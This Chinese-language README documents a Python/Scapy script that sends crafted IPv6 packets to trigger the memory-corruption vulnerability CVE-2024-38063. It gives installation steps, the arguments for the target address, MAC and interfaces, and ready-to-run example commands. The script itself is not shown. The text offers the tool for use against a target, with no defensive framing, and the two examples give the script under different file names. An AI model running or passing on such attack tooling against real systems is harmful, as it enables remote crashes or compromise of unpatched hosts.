此Python脚本旨在发送精心构造的数据包,以触发潜在的内存损坏漏洞CVE-2024-38063。它利用Scapy库创建并发送IPv6数据包,可选地使用指定的MAC地址。该脚本可处理多个网络接口。
pip install scapy
要使用此脚本,您需要提供几个命令行参数。以下是使用必需选项运行脚本的方法:
python cve-2024-38063.py --iface "eth0,eth1" --ip_addr "2001:db8::1" --mac_addr "00:1A:2B:3C:4D:5E" --num_tries 20 --num_batches 20
--iface:用于发送数据包的接口列表,以逗号分隔。此参数为必需。--ip_addr:数据包发送的目标IPv6地址。此参数为必需。--mac_addr:目标MAC地址。此为可选;如果省略,则不会添加以太网头部。--num_tries:每批的尝试次数。默认为20。--num_batches:尝试的批次数。默认为20。以下是使用两个接口发送数据包的示例命令:
python packet_sender.py --iface "eth0,eth1" --ip_addr "2001:db8::1" --mac_addr "00:1A:2B:3C:4D:5E" --num_tries 30 --num_batches 10
这会将数据包发送到指定的IP地址,并使用指定的MAC地址通过eth0和eth1发送,每批30次尝试,共10批。
w01fynwarcs提供想法